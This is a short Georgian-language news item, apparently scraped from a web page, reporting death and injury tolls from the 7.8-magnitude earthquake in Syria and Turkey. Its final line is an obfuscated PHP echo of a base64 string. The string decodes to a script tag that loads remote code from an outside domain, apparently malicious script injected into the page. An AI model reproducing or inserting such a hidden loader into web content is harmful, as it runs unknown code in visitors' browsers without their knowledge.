celsiusi
ავერსი საქკაბელი
სირიაში მიწისძვრის შედეგად დაღუპულთა რიცხვი 200-ს აჭარბებს, – ამის შესახებ ინფორმაციას ქვეყნის ჯანდაცვის სამინისტრო ავრცელებს.
ჯანდაცვის მინისტრის ინფორმაციით, სტიქიას 237 ადამიანი ემსხვერპლა. დაზარალებულ პროვინციებს შორისაა ალეპო, ლატაკია, ჰამა და ტარტუსი.
საავადმყოფოში გადაიყვანეს 600-ზე მეტი დაშავებული ადამიანი.
ძლიერი მიწისძვრა თურქეთსა და სირიაში დღეს გამთენიისას მოხდა. სტიქიის სიმძლავრე აშშ-ის გეოლოგიური სამსახურის ცნობით, 7,8 მაგნიტუდას შეადგენდა.
თურქეთში ბოლო ოფიციალური მონაცემებით, დაღუპულია 76 ადამიანი, 440 კი, დაშავდა.
324
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");